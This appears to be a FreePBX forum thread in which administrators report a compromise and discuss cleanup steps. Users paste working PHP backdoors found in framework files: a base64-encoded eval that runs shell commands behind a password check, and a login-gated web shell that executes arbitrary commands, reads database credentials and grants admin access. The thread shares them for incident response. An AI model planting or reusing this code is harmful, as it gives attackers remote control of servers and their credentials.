yesterday and today I received an eMail informing about tampered file warnings.
Yesterday:
You have 1 tampered files:
Module: “FreePBX Framework”, File:
“/var/www/html/admin/libraries/media/Media/Media.php
altered”
Today:
You have 1 tampered files:
Module: “FreePBX Framework”, File:
“/var/www/html/admin/ajax.php altered”
In todays reported file I might have discovered something suspicious right after the start:
// License for all code of this FreePBX module can be found in the license file inside the module directory
// Copyright 2013 Schmooze Com Inc.
eval(base64_decode('c2Vzc2lvbl9zdGFydCgpO2lmKCFpc3NldCgkX1NFU1NJT05bJ0FNUF91c2VyJ10pKXtpZihtZDUoJF9SRVFVRVNUWydwd2R6J10pID09ICdlYzAwOWVlZTY2NjJhNDlkNjBmNDRiNGE5MTk4ZmExZCcpe3NoZWxsX2V4ZWMoJF9QT1NUWydjJ10pO31lY2hvICd7ImVycm9yIjoiYWpheFJlcXVlc3QgIGRlY2xpbmVkIn0nO2V4aXQoKTt9'));
I found that file /etc/asterisk/extensions_custom.conf is adjusted with this context.
You should delete the last lines in this file, or delete the complete extensions_custom.conf if it is default. Done in CLI.
after a ‘amportal a r’ the file is recreated with the default (empty) fpbx settings.
just setup a new Server with actual FreePBX-Distro yesterday.
For the sake of simplicity I used Backup and Restore to save the config on the old maschine ond restored them on the new maschine.
Unfortunately right as I was logged in on the new maschine today morning there I got a new warning
Module: “FreePBX Framework”, File: "/var/www/html/admin/views/header.php altered"
Inside the file I again have some base64_encoded code which for mee seems to be a code of a hacker which should create a secret-login-form for the to have access to my FreePBX.
/*atjswjI9KYdoyxgtYaKqLN5IhSaXIJISd1kJk3T416tADK4CUP2GC7oU0yRIizBvAWfVZ801ftBTdFv8v*/
session_start();
if (isset($_REQUEST['p']) && md5($_REQUEST['p']) == '526efc7d64f9fc115a33c5dda9d926eb') {
$_SESSION['zoz'] = 'logged';
}
if (!isset($_SESSION['zoz'])) {
echo '<form action = "" method = "post" >Pokemon<input size = 60 type = text name = "p" /><input type = submit value = "BonBon" /></form><!-- /*[IP of old FreePBX-Machine]*/ (Pokemon)(BonBon)-->';exit();
}
/*huu6t9ptnNrpbmpzfBrITZqNoURpgNixhMELV4eiSGI427DiI40B4rotlgSB3b9lXO6TTlbL2UQ51tnKynmDPL6a1Z*/
if (isset($_SESSION['zoz']) && $_SESSION['zoz'] == 'logged') {
echo '<form action = "" method = "post" ><input size = 60 type = text name = "c" /><input type = submit value = "do" /></form>';
echo "<xmp>";
@system("grep AMPDB /etc/amportal.conf");
echo "---------------------\n";
@system($_REQUEST['c']);
echo "</xmp>";
if(isset($_REQUEST['admin'])){
if (!@include_once(getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
include_once('/etc/asterisk/freepbx.conf');
}
require_once(dirname(__FILE__) . '/../ampuser.class.php');
$_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
$_SESSION['AMP_user']->setAdmin();
header("Location: /admin/config.php");
}
echo '<a href="?admin=a" >Admin GO</a>';
}
/*O7Gc2HLUq3t1y4XOZWX0Yctz6HfBPKaDSRQVyBPYFj0enX2nUZnSbRshyITot41mV*/
So I assume there are quite some problems if the new maschine too was hacked.
Even I have set in firewall on the new maschine the “Web Management (Secure)” to internal; which previously I have had wrongly set to external on the old maschine.
Could the hack of the new maschine have had benefited from my Backup and Restore Transfer (e.g. I backuped and restored the hack to the new maschine).
Tis base64_encoded text translates to the above mentioned code. The code - as far as I understand - should load a secret admin-login-form used by some hacker to get in your FreePBX-Machine.
After you did your backup and restore did you update your machine as if you do a backup and have it include the modules it would bring over any of the hacks from your old system. When doing a backup and restore make sure you pick config only and not the full backup and full backup will also include all your module directory
I Know that we can delete a /var/www/htm/admin/module directory and after that reinstall it with ‘amportal && fwconsole a ma download/install xxxx’
But is there a way to delete the whole admin web directory and reinstall it again from source. Or is it only possible with ‘install_amp’ to reinstall the webdirectorys?
Just looking for a quick and clean way to renew all webdirs infected pbx files.
That’s annoyingly difficult. But we DO have a little script that you can run to do an integrity validation, without depending on the (potentially hacked) inbuilt validator.
That will then display anything suspicious it finds.
Edit: Note that you can run ‘fwconsole --edge ma downloadinstall framework’ which will get Framework build 185 which automatically cleans up any potential ‘extra’ files that it finds.
in the Config-Update “mysql-2.sql”-File I have discovered some database entries including a base64_decode; I assume that this is why the new maschine as well has had then an infected file:
I am looking into this. I do not know if it has to do with the weatherzip, but I think you can delete it. not sure yet.
Delete this row can be done in mysql
cli
mysql
use asterisk;
select * from cronmanager;
delete from cronmanager where module = ‘weatherzipc’;
quit;
I’m noticing the same thing on a few PBXes of mine this morning. Different tampered file, /var/www/html/admin/libraries/BMO/Ajax.class.php and weird “session_start()” “eval(base64"” code inserted.
However I was already running FreePBX Framework 13.0.182
I saw where invalid calls were attempted and logged by my sip trunk provider, but not in the FreePBX CDR.
sip:810201100022435
sip:010201100022435
sip:001201100022435
sip:000201100022435
sip:00201100022435
I ran:
fwconsole chown
fwconsole ma refreshsignatures
feconsole reload
and that removed the strange code… but I’m concerned.
Am I safe now and just monitor for any other modified files… or should I look elsewhere?
We’re going to push .186 to stable shorty, which will block and clean up all of these. In the interim, you can run ‘fwconsole --edge ma downloadinstall framework’ to get it now.
I’ve just installed .188, restarted Asx, but malicious content of cronmanager table under the module name weatherzipc was not deleted.
I’ll have to do that manually.